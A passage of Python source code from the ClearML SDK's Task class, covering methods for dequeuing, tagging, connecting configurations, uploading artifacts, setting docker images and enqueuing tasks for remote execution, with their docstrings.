"dequeued": 1,
"updated": 1,
"fields": {
"status": "created",
"status_reason": "",
"status_message": "",
"status_changed": "2020-02-24T16:43:43.057320+00:00",
"last_update": "2020-02-24T16:43:43.057320+00:00",
"execution.queue": null
}
}
- ``dequeued`` - The number of Tasks enqueued (an integer or ``null``).
- ``fields``
- ``status`` - The status of the experiment.
- ``status_reason`` - The reason for the last status change.
- ``status_message`` - Information about the status.
- ``status_changed`` - The last status change date and time in ISO 8601 format.
- ``last_update`` - The last time the Task was created, updated,
changed or events for this task were reported.
- ``execution.queue`` - The Id of the queue where the Task is enqueued. ``null`` indicates not enqueued.
- ``updated`` - The number of Tasks updated (an integer or ``null``).
"""
assert isinstance(task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("ClearML-server does not support DevOps features, "
"upgrade clearml-server to 0.12.0 or above")
task_id = task if isinstance(task, six.string_types) else task.id
session = cls._get_default_session()
req = tasks.DequeueRequest(task=task_id)
res = cls._send(session=session, req=req)
resp = res.response
return resp
def add_tags(self, tags):
# type: (Union[Sequence[str], str]) -> None
"""
Add Tags to this task. Old tags are not deleted. When executing a Task (experiment) remotely,
this method has no effect).
:param tags: A list of tags which describe the Task to add.
"""
if isinstance(tags, six.string_types):
tags = tags.split(" ")
self.data.tags = list(set((self.data.tags or []) + tags))
self._edit(tags=self.data.tags)
def connect(self, mutable, name=None):
# type: (Any, Optional[str]) -> Any
"""
Connect an object to a Task object. This connects an experiment component (part of an experiment) to the
experiment. For example, connect hyperparameters or models.
:param object mutable: The experiment component to connect. The object can be any object Task supports
integrating, including:
- argparse - An argparse object for parameters.
- dict - A dictionary for parameters.
- TaskParameters - A TaskParameters object.
- Model - A model object for initial model warmup, or for model update/snapshot uploading.
- Class type - A Class type, storing all class properties (excluding '_' prefix properties)
- Object - A class instance, storing all instance properties (excluding '_' prefix properties)
:param str name: A section name associated with the connected object, if 'name' is None defaults to 'General'
Currently only supported for `dict` / `TaskParameter` objects
Examples:
name='General' will put the connected dictionary under the General section in the hyper-parameters
name='Train' will put the connected dictionary under the Train section in the hyper-parameters
:return: The result returned when connecting the object, if supported.
:raise: Raise an exception on unsupported objects.
"""
# dispatching by match order
dispatch = (
(OutputModel, self._connect_output_model),
(InputModel, self._connect_input_model),
(ArgumentParser, self._connect_argparse),
(dict, self._connect_dictionary),
(TaskParameters, self._connect_task_parameters),
(type, self._connect_object),
(object, self._connect_object),
)
multi_config_support = Session.check_min_api_version('2.9')
if multi_config_support and not name and not isinstance(mutable, (OutputModel, InputModel)):
name = self._default_configuration_section_name
if not multi_config_support and name and name != self._default_configuration_section_name:
raise ValueError("Multiple configurations is not supported with the current 'clearml-server', "
"please upgrade to the latest version")
for mutable_type, method in dispatch:
if isinstance(mutable, mutable_type):
return method(mutable, name=name)
raise Exception('Unsupported mutable type %s: no connect function found' % type(mutable).__name__)
def connect_configuration(self, configuration, name=None, description=None):
# type: (Union[Mapping, list, Path, str], Optional[str], Optional[str]) -> Union[dict, Path, str]
"""
Connect a configuration dictionary or configuration file (pathlib.Path / str) to a Task object.
This method should be called before reading the configuration file.
Later, when creating an output model, the model will include the contents of the configuration dictionary
or file.
For example, a local file:
.. code-block:: py
config_file = task.connect_configuration(config_file)
my_params = json.load(open(config_file,'rt'))
A parameter dictionary/list:
.. code-block:: py
my_params = task.connect_configuration(my_params)
:param configuration: The configuration. This is usually the configuration used in the model training process.
Specify one of the following:
- A dictionary/list - A dictionary containing the configuration. ClearML stores the configuration in
the **ClearML Server** (backend), in a HOCON format (JSON-like format) which is editable.
- A ``pathlib2.Path`` string - A path to the configuration file. ClearML stores the content of the file.
A local path must be relative path. When executing a Task remotely in a worker, the contents brought
from the **ClearML Server** (backend) overwrites the contents of the file.
:param str name: Configuration section name. default: 'General'
Allowing users to store multiple configuration dicts/files
:param str description: Configuration section description (text). default: None
:return: If a dictionary is specified, then a dictionary is returned. If pathlib2.Path / string is
specified, then a path to a local configuration file is returned. Configuration object.
"""
pathlib_Path = None # noqa
if not isinstance(configuration, (dict, list, Path, six.string_types)):
try:
from pathlib import Path as pathlib_Path # noqa
except ImportError:
pass
if not pathlib_Path or not isinstance(configuration, pathlib_Path):
raise ValueError("connect_configuration supports `dict`, `str` and 'Path' types, "
"{} is not supported".format(type(configuration)))
multi_config_support = Session.check_min_api_version('2.9')
if multi_config_support and not name:
name = self._default_configuration_section_name
if not multi_config_support and name and name != self._default_configuration_section_name:
raise ValueError("Multiple configurations is not supported with the current 'clearml-server', "
"please upgrade to the latest version")
# parameter dictionary
if isinstance(configuration, (dict, list,)):
def _update_config_dict(task, config_dict):
if multi_config_support:
# noinspection PyProtectedMember
task._set_configuration(
name=name, description=description, config_type='dictionary', config_dict=config_dict)
else:
# noinspection PyProtectedMember
task._set_model_config(config_dict=config_dict)
if not running_remotely() or not (self.is_main_task() or self._is_remote_main_task()):
if multi_config_support:
self._set_configuration(
name=name, description=description, config_type='dictionary', config_dict=configuration)
else:
self._set_model_config(config_dict=configuration)
if isinstance(configuration, dict):
configuration = ProxyDictPostWrite(self, _update_config_dict, **configuration)
else:
# noinspection PyBroadException
try:
remote_configuration = self._get_configuration_dict(name=name) \
if multi_config_support else self._get_model_config_dict()
except Exception:
remote_configuration = None
if remote_configuration is None:
LoggerRoot.get_base_logger().warning(
"Could not retrieve remote configuration named \'{}\'\n"
"Using default configuration: {}".format(name, str(configuration)))
# update back configuration section
if multi_config_support:
self._set_configuration(
name=name, description=description,
config_type='dictionary', config_dict=configuration)
return configuration
if isinstance(configuration, dict):
configuration.clear()
configuration.update(remote_configuration)
configuration = ProxyDictPreWrite(False, False, **configuration)
elif isinstance(configuration, list):
configuration.clear()
configuration.extend(remote_configuration)
return configuration
# it is a path to a local file
if not running_remotely() or not (self.is_main_task() or self._is_remote_main_task()):
# check if not absolute path
configuration_path = Path(configuration)
if not configuration_path.is_file():
ValueError("Configuration file does not exist")
try:
with open(configuration_path.as_posix(), 'rt') as f:
configuration_text = f.read()
except Exception:
raise ValueError("Could not connect configuration file {}, file could not be read".format(
configuration_path.as_posix()))
if multi_config_support:
self._set_configuration(
name=name, description=description,
config_type=configuration_path.suffixes[-1].lstrip('.')
if configuration_path.suffixes and configuration_path.suffixes[-1] else 'file',
config_text=configuration_text)
else:
self._set_model_config(config_text=configuration_text)
return configuration
else:
configuration_text = self._get_configuration_text(name=name) if multi_config_support \
else self._get_model_config_text()
if configuration_text is None:
LoggerRoot.get_base_logger().warning(
"Could not retrieve remote configuration named \'{}\'\n"
"Using default configuration: {}".format(name, str(configuration)))
# update back configuration section
if multi_config_support:
configuration_path = Path(configuration)
if configuration_path.is_file():
with open(configuration_path.as_posix(), 'rt') as f:
configuration_text = f.read()
self._set_configuration(
name=name, description=description,
config_type=configuration_path.suffixes[-1].lstrip('.')
if configuration_path.suffixes and configuration_path.suffixes[-1] else 'file',
config_text=configuration_text)
return configuration
configuration_path = Path(configuration)
fd, local_filename = mkstemp(prefix='clearml_task_config_',
suffix=configuration_path.suffixes[-1] if
configuration_path.suffixes else '.txt')
os.write(fd, configuration_text.encode('utf-8'))
os.close(fd)
if pathlib_Path:
return pathlib_Path(local_filename)
return Path(local_filename) if isinstance(configuration, Path) else local_filename
def connect_label_enumeration(self, enumeration):
# type: (Dict[str, int]) -> Dict[str, int]
"""
Connect a label enumeration dictionary to a Task (experiment) object.
Later, when creating an output model, the model will include the label enumeration dictionary.
:param dict enumeration: A label enumeration dictionary of string (label) to integer (value) pairs.
For example:
.. code-block:: javascript
{
'background': 0,
'person': 1
}
:return: The label enumeration dictionary (JSON).
"""
if not isinstance(enumeration, dict):
raise ValueError("connect_label_enumeration supports only `dict` type, "
"{} is not supported".format(type(enumeration)))
if not running_remotely() or not (self.is_main_task() or self._is_remote_main_task()):
self.set_model_label_enumeration(enumeration)
else:
# pop everything
enumeration.clear()
enumeration.update(self.get_labels_enumeration())
return enumeration
def get_logger(self):
# type: () -> Logger
"""
Get a Logger object for reporting, for this task context. You can view all Logger report output associated with
the Task for which this method is called, including metrics, plots, text, tables, and images, in the
**ClearML Web-App (UI)**.
:return: The Logger for the Task (experiment).
"""
return self._get_logger(auto_connect_streams=self._log_to_backend)
def mark_started(self, force=False):
# type: (bool) -> ()
"""
Manually mark a Task as started (happens automatically)
:param bool force: If True the task status will be changed to `started` regardless of the current Task state.
"""
# UI won't let us see metrics if we're not started
self.started(force=force)
self.reload()
def mark_stopped(self, force=False, status_message=None):
# type: (bool, Optional[str]) -> ()
"""
Manually mark a Task as stopped (also used in :meth:`_at_exit`)
:param bool force: If True the task status will be changed to `stopped` regardless of the current Task state.
:param str status_message: Optional, add status change message to the stop request.
This message will be stored as status_message on the Task's info panel
"""
# flush any outstanding logs
self.flush(wait_for_uploads=True)
# mark task as stopped
self.stopped(force=force, status_message=str(status_message) if status_message else None)
def flush(self, wait_for_uploads=False):
# type: (bool) -> bool
"""
Flush any outstanding reports or console logs.
:param bool wait_for_uploads: Wait for all outstanding uploads to complete
- ``True`` - Wait
- ``False`` - Do not wait (default)
"""
# make sure model upload is done
if BackendModel.get_num_results() > 0 and wait_for_uploads:
BackendModel.wait_for_results()
# flush any outstanding logs
if self._logger:
# noinspection PyProtectedMember
self._logger._flush_stdout_handler()
if self.__reporter:
self.__reporter.flush()
if wait_for_uploads:
self.__reporter.wait_for_events()
LoggerRoot.flush()
return True
def reset(self, set_started_on_success=False, force=False):
# type: (bool, bool) -> None
"""
Reset a Task. ClearML reloads a Task after a successful reset.
When a worker executes a Task remotely, the Task does not reset unless
the ``force`` parameter is set to ``True`` (this avoids accidentally clearing logs and metrics).
:param bool set_started_on_success: If successful, automatically set the Task to `started`
- ``True`` - If successful, set to started.
- ``False`` - If successful, do not set to started. (default)
:param bool force: Force a Task reset, even when executing the Task (experiment) remotely in a worker
- ``True`` - Force
- ``False`` - Do not force (default)
"""
if not running_remotely() or not self.is_main_task() or force:
super(Task, self).reset(set_started_on_success=set_started_on_success, force=force)
def close(self):
"""
Close the current Task. Enables you to manually shutdown the task.
.. warning::
Only call :meth:`Task.close` if you are certain the Task is not needed.
"""
if self._at_exit_called:
return
# store is main before we call at_exit, because will will Null it
is_main = self.is_main_task()
is_sub_process = self.__is_subprocess()
# wait for repository detection (5 minutes should be reasonable time to detect all packages)
if self._logger and not self.__is_subprocess():
self._wait_for_repo_detection(timeout=300.)
self.__shutdown()
# unregister atexit callbacks and signal hooks, if we are the main task
if is_main:
self.__register_at_exit(None)
if not is_sub_process:
# make sure we enable multiple Task.init callas with reporting sub-processes
BackgroundMonitor.clear_main_process(self)
# noinspection PyProtectedMember
Logger._remove_std_logger()
def delete(self, delete_artifacts_and_models=True, skip_models_used_by_other_tasks=True, raise_on_error=False):
# type: (bool, bool, bool) -> bool
"""
Delete the task as well as it's output models and artifacts.
Models and artifacts are deleted from their storage locations, each using its URI.
Note: in order to delete models and artifacts using their URI, make sure the proper storage credentials are
configured in your configuration file (e.g. if an artifact is stored in S3, make sure sdk.aws.s3.credentials
are properly configured and that you have delete permission in the related buckets).
:param delete_artifacts_and_models: If True, artifacts and models would also be deleted (default True)
:param skip_models_used_by_other_tasks: If True, models used by other tasks would not be deleted (default True)
:param raise_on_error: If True an exception will be raised when encountering an error.
If False an error would be printed and no exception will be raised.
:return: True if the task was deleted successfully.
"""
if not running_remotely() or not self.is_main_task():
return super(Task, self)._delete(
delete_artifacts_and_models=delete_artifacts_and_models,
skip_models_used_by_other_tasks=skip_models_used_by_other_tasks,
raise_on_error=raise_on_error,
)
return False
def register_artifact(self, name, artifact, metadata=None, uniqueness_columns=True):
# type: (str, pandas.DataFrame, Dict, Union[bool, Sequence[str]]) -> None
"""
Register (add) an artifact for the current Task. Registered artifacts are dynamically sychronized with the
**ClearML Server** (backend). If a registered artifact is updated, the update is stored in the
**ClearML Server** (backend). Registered artifacts are primarily used for Data Auditing.
The currently supported registered artifact object type is a pandas.DataFrame.
See also :meth:`Task.unregister_artifact` and :meth:`Task.get_registered_artifacts`.
.. note::
ClearML also supports uploaded artifacts which are one-time uploads of static artifacts that are not
dynamically sychronized with the **ClearML Server** (backend). These static artifacts include
additional object types. For more information, see :meth:`Task.upload_artifact`.
:param str name: The name of the artifact.
.. warning::
If an artifact with the same name was previously registered, it is overwritten.
:param object artifact: The artifact object.
:param dict metadata: A dictionary of key-value pairs for any metadata. This dictionary appears with the
experiment in the **ClearML Web-App (UI)**, **ARTIFACTS** tab.
:param uniqueness_columns: A Sequence of columns for artifact uniqueness comparison criteria, or the default
value of ``True``. If ``True``, the artifact uniqueness comparison criteria is all the columns,
which is the same as ``artifact.columns``.
"""
if not isinstance(uniqueness_columns, CollectionsSequence) and uniqueness_columns is not True:
raise ValueError('uniqueness_columns should be a List (sequence) or True')
if isinstance(uniqueness_columns, str):
uniqueness_columns = [uniqueness_columns]
self._artifacts_manager.register_artifact(
name=name, artifact=artifact, metadata=metadata, uniqueness_columns=uniqueness_columns)
def unregister_artifact(self, name):
# type: (str) -> None
"""
Unregister (remove) a registered artifact. This removes the artifact from the watch list that ClearML uses
to synchronize artifacts with the **ClearML Server** (backend).
.. important::
- Calling this method does not remove the artifact from a Task. It only stops ClearML from
monitoring the artifact.
- When this method is called, ClearML immediately takes the last snapshot of the artifact.
"""
self._artifacts_manager.unregister_artifact(name=name)
def get_registered_artifacts(self):
# type: () -> Dict[str, Artifact]
"""
Get a dictionary containing the Task's registered (dynamically synchronized) artifacts (name, artifact object).
.. note::
After calling ``get_registered_artifacts``, you can still modify the registered artifacts.
:return: The registered (dynamically synchronized) artifacts.
"""
return self._artifacts_manager.registered_artifacts
def upload_artifact(
self,
name, # type: str
artifact_object, # type: Union[str, Mapping, pandas.DataFrame, numpy.ndarray, Image.Image, Any]
metadata=None, # type: Optional[Mapping]
delete_after_upload=False, # type: bool
auto_pickle=True, # type: bool
preview=None, # type: Any
wait_on_upload=False, # type: bool
):
# type: (...) -> bool
"""
Upload (add) a static artifact to a Task object. The artifact is uploaded in the background.
The currently supported upload (static) artifact types include:
- string / pathlib2.Path - A path to artifact file. If a wildcard or a folder is specified, then ClearML
creates and uploads a ZIP file.
- dict - ClearML stores a dictionary as ``.json`` file and uploads it.
- pandas.DataFrame - ClearML stores a pandas.DataFrame as ``.csv.gz`` (compressed CSV) file and uploads it.
- numpy.ndarray - ClearML stores a numpy.ndarray as ``.npz`` file and uploads it.
- PIL.Image - ClearML stores a PIL.Image as ``.png`` file and uploads it.
- Any - If called with auto_pickle=True, the object will be pickled and uploaded.
:param str name: The artifact name.
.. warning::
If an artifact with the same name was previously uploaded, then it is overwritten.
:param object artifact_object: The artifact object.
:param dict metadata: A dictionary of key-value pairs for any metadata. This dictionary appears with the
experiment in the **ClearML Web-App (UI)**, **ARTIFACTS** tab.
:param bool delete_after_upload: After the upload, delete the local copy of the artifact
- ``True`` - Delete the local copy of the artifact.
- ``False`` - Do not delete. (default)
:param bool auto_pickle: If True (default) and the artifact_object is not one of the following types:
pathlib2.Path, dict, pandas.DataFrame, numpy.ndarray, PIL.Image, url (string), local_file (string)
the artifact_object will be pickled and uploaded as pickle file artifact (with file extension .pkl)
:param Any preview: The artifact preview
:param bool wait_on_upload: Whether or not the upload should be synchronous, forcing the upload to complete
before continuing.
:return: The status of the upload.
- ``True`` - Upload succeeded.
- ``False`` - Upload failed.
:raise: If the artifact object type is not supported, raise a ``ValueError``.
"""
return self._artifacts_manager.upload_artifact(
name=name, artifact_object=artifact_object, metadata=metadata, delete_after_upload=delete_after_upload,
auto_pickle=auto_pickle, preview=preview, wait_on_upload=wait_on_upload)
def get_models(self):
# type: () -> Mapping[str, Sequence[Model]]
"""
Return a dictionary with {'input': [], 'output': []} loaded/stored models of the current Task
Input models are files loaded in the task, either manually or automatically logged
Output models are files stored in the task, either manually or automatically logged
Automatically logged frameworks are for example: TensorFlow, Keras, PyTorch, ScikitLearn(joblib) etc.
:return: A dictionary-like object with "input"/"output" keys and input/output properties, pointing to a
list-like object containing of Model objects. Each list-like object also acts as a dictionary, mapping
model name to a appropriate model instance.
Example:
.. code-block:: py
{'input': [clearml.Model()], 'output': [clearml.Model()]}
"""
return TaskModels(self)
def is_current_task(self):
# type: () -> bool
"""
.. deprecated:: 0.13.0
This method is deprecated. Use :meth:`Task.is_main_task` instead.
Is this Task object the main execution Task (initially returned by :meth:`Task.init`)
:return: Is this Task object the main execution Task
- ``True`` - Is the main execution Task.
- ``False`` - Is not the main execution Task.
"""
return self.is_main_task()
def is_main_task(self):
# type: () -> bool
"""
Is this Task object the main execution Task (initially returned by :meth:`Task.init`)
.. note::
If :meth:`Task.init` was never called, this method will *not* create
it, making this test more efficient than:
.. code-block:: py
Task.init() == task
:return: Is this Task object the main execution Task
- ``True`` - Is the main execution Task.
- ``False`` - Is not the main execution Task.
"""
return self is self.__main_task
def set_model_config(self, config_text=None, config_dict=None):
# type: (Optional[str], Optional[Mapping]) -> None
"""
.. deprecated:: 0.14.1
Use :meth:`Task.connect_configuration` instead.
"""
self._set_model_config(config_text=config_text, config_dict=config_dict)
def get_model_config_text(self):
# type: () -> str
"""
.. deprecated:: 0.14.1
Use :meth:`Task.connect_configuration` instead.
"""
return self._get_model_config_text()
def get_model_config_dict(self):
# type: () -> Dict
"""
.. deprecated:: 0.14.1
Use :meth:`Task.connect_configuration` instead.
"""
return self._get_model_config_dict()
def set_model_label_enumeration(self, enumeration=None):
# type: (Optional[Mapping[str, int]]) -> ()
"""
Set the label enumeration for the Task object before creating an output model.
Later, when creating an output model, the model will inherit these properties.
:param dict enumeration: A label enumeration dictionary of string (label) to integer (value) pairs.
For example:
.. code-block:: javascript
{
'background': 0,
'person': 1
}
"""
super(Task, self).set_model_label_enumeration(enumeration=enumeration)
def get_last_iteration(self):
# type: () -> int
"""
Get the last reported iteration, which is the last iteration for which the Task reported a metric.
.. note::
The maximum reported iteration is not in the local cache. This method
sends a request to the **ClearML Server** (backend).
:return: The last reported iteration number.
"""
self._reload_last_iteration()
return max(self.data.last_iteration or 0, self.__reporter.max_iteration if self.__reporter else 0)
def set_initial_iteration(self, offset=0):
# type: (int) -> int
"""
Set initial iteration, instead of zero. Useful when continuing training from previous checkpoints
:param int offset: Initial iteration (at starting point)
:return: Newly set initial offset.
"""
return super(Task, self).set_initial_iteration(offset=offset)
def get_initial_iteration(self):
# type: () -> int
"""
Return the initial iteration offset, default is 0
Useful when continuing training from previous checkpoints
:return: Initial iteration offset.
"""
return super(Task, self).get_initial_iteration()
def get_last_scalar_metrics(self):
# type: () -> Dict[str, Dict[str, Dict[str, float]]]
"""
Get the last scalar metrics which the Task reported. This is a nested dictionary, ordered by title and series.
For example:
.. code-block:: javascript
{
'title': {
'series': {
'last': 0.5,
'min': 0.1,
'max': 0.9
}
}
}
:return: The last scalar metrics.
"""
self.reload()
metrics = self.data.last_metrics
scalar_metrics = dict()
for i in metrics.values():
for j in i.values():
scalar_metrics.setdefault(j['metric'], {}).setdefault(
j['variant'], {'last': j['value'], 'min': j['min_value'], 'max': j['max_value']})
return scalar_metrics
def get_parameters_as_dict(self):
# type: () -> Dict
"""
Get the Task parameters as a raw nested dictionary.
.. note::
The values are not parsed. They are returned as is.
"""
return naive_nested_from_flat_dictionary(self.get_parameters())
def set_parameters_as_dict(self, dictionary):
# type: (Dict) -> None
"""
Set the parameters for the Task object from a dictionary. The dictionary can be nested.
This does not link the dictionary to the Task object. It does a one-time update. This
is the same behavior as the :meth:`Task.connect` method.
"""
self._arguments.copy_from_dict(flatten_dictionary(dictionary))
def get_user_properties(self, value_only=False):
# type: (bool) -> Dict[str, Union[str, dict]]
"""
Get user properties for this task.
Returns a dictionary mapping user property name to user property details dict.
:param value_only: If True, returned user property details will be a string representing the property value.
"""
if not Session.check_min_api_version("2.9"):
self.log.info("User properties are not supported by the server")
return {}
section = "properties"
params = self._hyper_params_manager.get_hyper_params(
sections=[section], projector=attrgetter("value") if value_only else None
)
return dict(params.get(section, {}))
def set_user_properties(
self,
*iterables, # type: Union[Mapping[str, Union[str, dict, None]], Iterable[dict]]
**properties # type: Union[str, dict, int, float, None]
):
# type: (...) -> bool
"""
Set user properties for this task.
A user property can contain the following fields (all of type string):
name / value / description / type
Examples:
task.set_user_properties(backbone='great', stable=True)
task.set_user_properties(backbone={"type": int, "description": "network type", "value": "great"}, )
task.set_user_properties(
{"name": "backbone", "description": "network type", "value": "great"},
{"name": "stable", "description": "is stable", "value": True},
)
:param iterables: Properties iterables, each can be:
* A dictionary of string key (name) to either a string value (value) a dict (property details). If the value
is a dict, it must contain a "value" field. For example:
.. code-block:: javascript
{
"property_name": {"description": "This is a user property", "value": "property value"},
"another_property_name": {"description": "This is user property", "value": "another value"},
"yet_another_property_name": "some value"
}
* An iterable of dicts (each representing property details). Each dict must contain a "name" field and a
"value" field. For example:
.. code-block:: javascript
[
{
"name": "property_name",
"description": "This is a user property",
"value": "property value"
},
{
"name": "another_property_name",
"description": "This is another user property",
"value": "another value"
}
]
:param properties: Additional properties keyword arguments. Key is the property name, and value can be
a string (property value) or a dict (property details). If the value is a dict, it must contain a "value"
field. For example:
.. code-block:: javascript
{
"property_name": "string as property value",
"another_property_name": {
"type": "string",
"description": "This is user property",
"value": "another value"
}
}
"""
if not Session.check_min_api_version("2.9"):
self.log.info("User properties are not supported by the server")
return False
return self._hyper_params_manager.edit_hyper_params(
iterables=list(properties.items()) + (
list(iterables.items()) if isinstance(iterables, dict) else list(iterables)),
replace='none',
force_section="properties",
)
def get_script(self):
# type: (...) -> Mapping[str, Optional[str]]
"""
Get task's script details.
Returns a dictionary containing the script details.
:return: Dictionary with script properties e.g.
{
'working_dir': 'examples/reporting',
'entry_point': 'artifacts.py',
'branch': 'master',
'repository': 'https://github.com/allegroai/clearml.git'
}
"""
script = self.data.script
return {
"working_dir": script.working_dir,
"entry_point": script.entry_point,
"branch": script.branch,
"repository": script.repository
}
def set_script(
self,
repository=None, # type: Optional[str]
branch=None, # type: Optional[str]
commit=None, # type: Optional[str]
diff=None, # type: Optional[str]
working_dir=None, # type: Optional[str]
entry_point=None, # type: Optional[str]
):
# type: (...) -> None
"""
Set task's script.
Examples:
task.set_script(repository='https://github.com/allegroai/clearml.git,
branch='main',
working_dir='examples/reporting',
entry_point='artifacts.py')
:param repository: Optional, URL of remote repository. use empty string ("") to clear repository entry.
:param branch: Optional, Select specific repository branch / tag. use empty string ("") to clear branch entry.
:param commit: Optional, set specific git commit id. use empty string ("") to clear commit id entry.
:param diff: Optional, set "git diff" section. use empty string ("") to clear git-diff entry.
:param working_dir: Optional, Working directory to launch the script from.
:param entry_point: Optional, Path to execute within the repository.
"""
self.reload()
script = self.data.script
if repository is not None:
script.repository = str(repository) or None
if branch is not None:
script.branch = str(branch) or None
if script.tag:
script.tag = None
if commit is not None:
script.version_num = str(commit) or None
if diff is not None:
script.diff = str(diff) or None
if working_dir is not None:
script.working_dir = str(working_dir)
if entry_point is not None:
script.entry_point = str(entry_point)
# noinspection PyProtectedMember
self._update_script(script=script)
def delete_user_properties(self, *iterables):
# type: (Iterable[Union[dict, Iterable[str, str]]]) -> bool
"""
Delete hyper-parameters for this task.
:param iterables: Hyper parameter key iterables. Each an iterable whose possible values each represent
a hyper-parameter entry to delete, value formats are:
* A dictionary containing a 'section' and 'name' fields
* An iterable (e.g. tuple, list etc.) whose first two items denote 'section' and 'name'
"""
if not Session.check_min_api_version("2.9"):
self.log.info("User properties are not supported by the server")
return False
return self._hyper_params_manager.delete_hyper_params(*iterables)
def set_base_docker(
self,
docker_cmd=None, # type: Optional[str]
docker_image=None, # type: Optional[str]
docker_arguments=None, # type: Optional[Union[str, Sequence[str]]]
docker_setup_bash_script=None # type: Optional[Union[str, Sequence[str]]]
):
# type: (...) -> ()
"""
Set the base docker image for this experiment
If provided, this value will be used by clearml-agent to execute this experiment
inside the provided docker image.
When running remotely the call is ignored
:param docker_cmd: Deprecated! compound docker container image + arguments
(example: 'nvidia/cuda:11.1 -e test=1') Deprecated, use specific arguments.
:param docker_image: docker container image (example: 'nvidia/cuda:11.1')
:param docker_arguments: docker execution parameters (example: '-e ENV=1')
:param docker_setup_bash_script: bash script to run at the
beginning of the docker before launching the Task itself. example: ['apt update', 'apt-get install -y gcc']
"""
if not self.running_locally() and self.is_main_task():
return
super(Task, self).set_base_docker(
docker_cmd=docker_cmd or docker_image,
docker_arguments=docker_arguments,
docker_setup_bash_script=docker_setup_bash_script
)
def set_resource_monitor_iteration_timeout(self, seconds_from_start=1800):
# type: (float) -> bool
"""
Set the ResourceMonitor maximum duration (in seconds) to wait until first scalar/plot is reported.
If timeout is reached without any reporting, the ResourceMonitor will start reporting machine statistics based
on seconds from Task start time (instead of based on iteration)
:param seconds_from_start: Maximum number of seconds to wait for scalar/plot reporting before defaulting
to machine statistics reporting based on seconds from experiment start time
:return: True if success
"""
if not self._resource_monitor:
return False
self._resource_monitor.wait_for_first_iteration = seconds_from_start
self._resource_monitor.max_check_first_iteration = seconds_from_start
return True
def execute_remotely(self, queue_name=None, clone=False, exit_process=True):
# type: (Optional[str], bool, bool) -> Optional[Task]
"""
If task is running locally (i.e., not by ``clearml-agent``), then clone the Task and enqueue it for remote
execution; or, stop the execution of the current Task, reset its state, and enqueue it. If ``exit==True``,
*exit* this process.
.. note::
If the task is running remotely (i.e., ``clearml-agent`` is executing it), this call is a no-op
(i.e., does nothing).
:param queue_name: The queue name used for enqueueing the task. If ``None``, this call exits the process
without enqueuing the task.
:param clone: Clone the Task and execute the newly cloned Task
The values are:
- ``True`` - A cloned copy of the Task will be created, and enqueued, instead of this Task.
- ``False`` - The Task will be enqueued.
:param exit_process: The function call will leave the calling process at the end
- ``True`` - Exit the process (exit(0)).
- ``False`` - Do not exit the process.
.. warning::
If ``clone==False``, then ``exit_process`` must be ``True``.
:return Task: return the task object of the newly generated remotely executing task
"""
# do nothing, we are running remotely
if running_remotely() and self.is_main_task():
return None
if not self.is_main_task():
LoggerRoot.get_base_logger().warning(
"Calling task.execute_remotely is only supported on main Task (created with Task.init)\n"
"Defaulting to self.enqueue(queue_name={})".format(queue_name)
)
if not queue_name:
raise ValueError("queue_name must be provided")
enqueue_task = Task.clone(source_task=self) if clone else self
Task.enqueue(task=enqueue_task, queue_name=queue_name)
return
if not clone and not exit_process:
raise ValueError(
"clone==False and exit_process==False is not supported. "
"Task enqueuing itself must exit the process afterwards.")
# make sure we analyze the process
if self.status in (Task.TaskStatusEnum.in_progress,):
if clone:
# wait for repository detection (5 minutes should be reasonable time to detect all packages)
self.flush(wait_for_uploads=True)
if self._logger and not self.__is_subprocess():
self._wait_for_repo_detection(timeout=300.)
else:
# close ourselves (it will make sure the repo is updated)
self.close()
# clone / reset Task
if clone:
task = Task.clone(self)
else:
task = self
# check if the server supports enqueueing aborted/stopped Tasks
if Session.check_min_api_server_version('2.13'):
self.mark_stopped(force=True)
else:
self.reset()
# enqueue ourselves
if queue_name:
Task.enqueue(task, queue_name=queue_name)
LoggerRoot.get_base_logger().warning(
'Switching to remote execution, output log page {}'.format(task.get_output_log_web_page()))
else:
# Remove the development system tag
system_tags = [t for t in task.get_system_tags() if t != self._development_tag]
self.set_system_tags(system_tags)
# if we leave the Task out there, it makes sense to make it editable.
self.reset(force=True)
# leave this process.
if exit_process:
LoggerRoot.get_base_logger().warning('Terminating local execution process')
leave_process(0)
return task
def create_function_task(self, func, func_name=None, task_name=None, **kwargs):
# type: (Callable, Optional[str], Optional[str], **Optional[Any]) -> Optional[Task]
"""
Create a new task, and call ``func`` with the specified kwargs.
One can think of this call as remote forking, where the newly created instance is the new Task
calling the specified func with the appropriate kwargs and leave once the func terminates.
Notice that a remote executed function cannot create another child remote executed function.
.. note::
- Must be called from the main Task, i.e. the one created by Task.init(...)
- The remote Tasks inherits the environment from the creating Task
- In the remote Task, the entrypoint is the same as the creating Task
- In the remote Task, the execution is the same until reaching this function call
:param func: A function to execute remotely as a single Task.
On the remote executed Task the entry-point and the environment are copied from this
calling process, only this function call redirect the the execution flow to the called func,
alongside the passed arguments
:param func_name: A unique identifier of the function. Default the function name without the namespace.
For example Class.foo() becomes 'foo'
:param task_name: The newly create Task name. Default: the calling Task name + function name
:param kwargs: name specific arguments for the target function.
These arguments will appear under the configuration, "Function" section
:return Task: Return the newly created Task or None if running remotely and execution is skipped
"""
if not self.is_main_task():
raise ValueError("Only the main Task object can call create_function_task()")
if not callable(func):
raise ValueError("func must be callable")
if not Session.check_min_api_version('2.9'):
raise ValueError("Remote function execution is not supported, "
"please upgrade to the latest server version")
func_name = str(func_name or func.__name__).strip()
if func_name in self._remote_functions_generated:
raise ValueError("Function name must be unique, a function by the name '{}' "
"was already created by this Task.".format(func_name))
section_name = 'Function'
tag_name = 'func'
func_marker = '__func_readonly__'
# sanitize the dict, leave only basic types that we might want to override later in the UI
func_params = {k: v for k, v in kwargs.items() if verify_basic_value(v)}
func_params[func_marker] = func_name
# do not query if we are running locally, there is no need.
task_func_marker = self.running_locally() or self.get_parameter('{}/{}'.format(section_name, func_marker))
# if we are running locally or if we are running remotely but we are not a forked tasks
# condition explained:
# (1) running in development mode creates all the forked tasks
# (2) running remotely but this is not one of the forked tasks (i.e. it is missing the fork tag attribute)
if self.running_locally() or not task_func_marker:
self._wait_for_repo_detection(300)
task = self.clone(self, name=task_name or '{} <{}>'.format(self.name, func_name), parent=self.id)
task.set_system_tags((task.get_system_tags() or []) + [tag_name])
task.connect(func_params, name=section_name)
self._remote_functions_generated[func_name] = task.id
return task
# check if we are one of the generated functions and if this is us,
# if we are not the correct function, not do nothing and leave
if task_func_marker != func_name:
self._remote_functions_generated[func_name] = len(self._remote_functions_generated) + 1
return
# mark this is us:
self._remote_functions_generated[func_name] = self.id
# this is us for sure, let's update the arguments and call the function
self.connect(func_params, name=section_name)
